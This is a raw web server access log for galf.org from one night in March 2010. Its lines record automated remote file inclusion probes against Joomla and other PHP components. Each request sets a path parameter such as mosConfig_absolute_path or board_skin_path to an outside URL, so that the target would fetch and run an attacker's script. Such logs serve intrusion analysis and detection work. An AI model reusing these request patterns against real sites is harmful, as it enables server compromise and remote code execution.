200.157.211.204 - - [01/Mar/2010:01:50:18 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:01:50:18 -0800] "GET /logs/access_100215.log//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:51:22 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:51:22 -0800] "GET /logs/access_100215.log//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:51:22 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:52:34 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:52:34 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:52:34 -0800] "GET /logs/access_100215.log%20%20//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:53:18 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:53:18 -0800] "GET /logs/access_100215.log//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:01:53:18 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.38.160.77 - - [01/Mar/2010:01:54:58 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
84.38.160.77 - - [01/Mar/2010:01:54:58 -0800] "GET /logs/access_091228.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
84.38.160.77 - - [01/Mar/2010:01:54:58 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.galf.org"
84.38.160.77 - - [01/Mar/2010:01:58:27 -0800] "GET /logs/access_091228.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.76" "www.galf.org"
95.131.66.198 - - [01/Mar/2010:02:00:07 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [01/Mar/2010:02:00:07 -0800] "GET /logs/access_091228.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [01/Mar/2010:02:00:07 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.131.66.198 - - [01/Mar/2010:02:00:07 -0800] "GET /logs/access_100118.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [01/Mar/2010:02:00:17 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [01/Mar/2010:02:00:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [01/Mar/2010:02:00:17 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [01/Mar/2010:02:00:31 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [01/Mar/2010:02:00:31 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [01/Mar/2010:02:00:31 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [01/Mar/2010:02:01:49 -0800] "GET /logs/access_091228.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
122.201.82.173 - - [01/Mar/2010:02:01:49 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
122.201.82.173 - - [01/Mar/2010:02:01:49 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:04:51 -0800] "GET /logs/access_090907.log//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:04:51 -0800] "GET /logs/access_091012.log//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:04:51 -0800] "GET /mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:04:51 -0800] "GET /logs//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.108.237.12 - - [01/Mar/2010:02:05:34 -0800] "GET /include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.108.237.12 - - [01/Mar/2010:02:05:35 -0800] "GET /logs/access_091207.log%20%20//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.108.237.12 - - [01/Mar/2010:02:05:35 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [01/Mar/2010:02:05:48 -0800] "GET /logs/access_091228.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:24 -0800] "GET /logs/access_100222.log//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:25 -0800] "GET /mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:24 -0800] "GET /logs//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:30 -0800] "GET /logs/access_091123.log//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:30 -0800] "GET /logs//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:30 -0800] "GET /mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:39 -0800] "GET /logs/access_091123.log//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:39 -0800] "GET /mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:39 -0800] "GET /logs//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [01/Mar/2010:02:08:40 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [01/Mar/2010:02:08:40 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [01/Mar/2010:02:08:43 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://manjae.oolim.net/bbs/data/diary/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:54 -0800] "GET /mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:54 -0800] "GET /logs/access_100222.log//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.143.198 - - [01/Mar/2010:02:08:54 -0800] "GET /logs//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:02:09:57 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:02:09:57 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:02:09:57 -0800] "GET /logs/access_100215.log%20%20//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:02:09:59 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:02:09:59 -0800] "GET /logs/access_100215.log%20%20//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:02:09:59 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:02:10:05 -0800] "GET /logs/access_100215.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:02:10:17 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:02:10:17 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:02:10:17 -0800] "GET /logs/access_100215.log//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:02:11:27 -0800] "GET /logs/access_100215.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [01/Mar/2010:02:11:45 -0800] "GET /logs/access_100215.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:02:12:09 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:02:12:09 -0800] "GET /logs/access_100215.log//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [01/Mar/2010:02:12:09 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:12:44 -0800] "GET /administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:12:44 -0800] "GET /logs/access.log/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:12:44 -0800] "GET /logs/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:12:56 -0800] "GET /administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:12:56 -0800] "GET /logs/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:12:58 -0800] "GET /logs/access.log/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:13:00 -0800] "GET /logs/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:13:00 -0800] "GET /administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:13:02 -0800] "GET /logs/access.log/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.150.78.218 - - [01/Mar/2010:02:13:05 -0800] "GET /include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.150.78.218 - - [01/Mar/2010:02:13:05 -0800] "GET /logs/access_100104.log%20%20//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.150.78.218 - - [01/Mar/2010:02:13:05 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:02:14:06 -0800] "GET /skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:02:14:06 -0800] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Mar/2010:02:14:06 -0800] "GET /logs/access_100215.log//skin/board/moviefl/download.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [01/Mar/2010:02:14:24 -0800] "GET /components/com_sef/config/config.sef.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
216.119.103.16 - - [01/Mar/2010:02:14:24 -0800] "GET /logs//components/com_sef/config/config.sef.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
216.108.237.12 - - [01/Mar/2010:02:18:47 -0800] "GET /logs/access_091207.log//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:19:14 -0800] "GET /logs/access_100222.log/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:19:15 -0800] "GET /logs/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:19:15 -0800] "GET /administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:19:31 -0800] "GET /logs/access_100222.log/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:19:31 -0800] "GET /logs/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:19:32 -0800] "GET /administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:19:34 -0800] "GET /logs/access_100222.log/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:19:34 -0800] "GET /administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:19:35 -0800] "GET /logs/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:02:20:31 -0800] "GET /logs/access_100111.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:02:20:31 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:02:20:32 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.108.237.12 - - [01/Mar/2010:02:20:53 -0800] "GET /logs/access_090713.log//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.150.78.218 - - [01/Mar/2010:02:22:25 -0800] "GET /logs/access_100104.log//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.150.78.218 - - [01/Mar/2010:02:22:54 -0800] "GET /logs/access_100118.log//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:25:20 -0800] "GET /logs/access.log%20%20/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:25:23 -0800] "GET /logs/access.log%20%20/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:25:28 -0800] "GET /logs/access.log%20%20/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.138.158.46 - - [01/Mar/2010:02:26:59 -0800] "GET /?INCLUDE_FOLDER=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [01/Mar/2010:02:26:59 -0800] "GET /logs/access_091123.log%20%20/?INCLUDE_FOLDER=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [01/Mar/2010:02:26:59 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:27:10 -0800] "GET /administrator/components/com_virtuemart/export.php%20mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:27:10 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php%20mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:27:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php%20mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [01/Mar/2010:02:27:18 -0800] "GET /logs/access_091221.log//administrator/components/com_virtuemart/export.php%20mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:27:18 -0800] "GET /administrator/components/com_virtuemart/export.php%20mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:27:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php%20mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [01/Mar/2010:02:27:36 -0800] "GET /logs/access_091214.log%20%20/?INCLUDE_FOLDER=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:29:18 -0800] "GET /logs/access_100125.log%20%20/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.108.237.12 - - [01/Mar/2010:02:29:21 -0800] "GET /logs/access_100104.log//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:29:21 -0800] "GET /logs/access_100125.log%20%20/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [01/Mar/2010:02:29:27 -0800] "GET /logs/access_100125.log%20%20/administrator/components/com_admin/index.html/?mosConfig_absolute_path=http://www.samer1.net/space/ray/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.108.237.12 - - [01/Mar/2010:02:29:34 -0800] "GET /logs/access_100118.log//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.138.158.46 - - [01/Mar/2010:02:31:06 -0800] "GET /logs/access_091012.log/?INCLUDE_FOLDER=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [01/Mar/2010:02:31:31 -0800] "GET /logs/access_100201.log///bbs//delete_all.php?board_skin_path=http://www.native79.com/utfboard///bbs///////id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
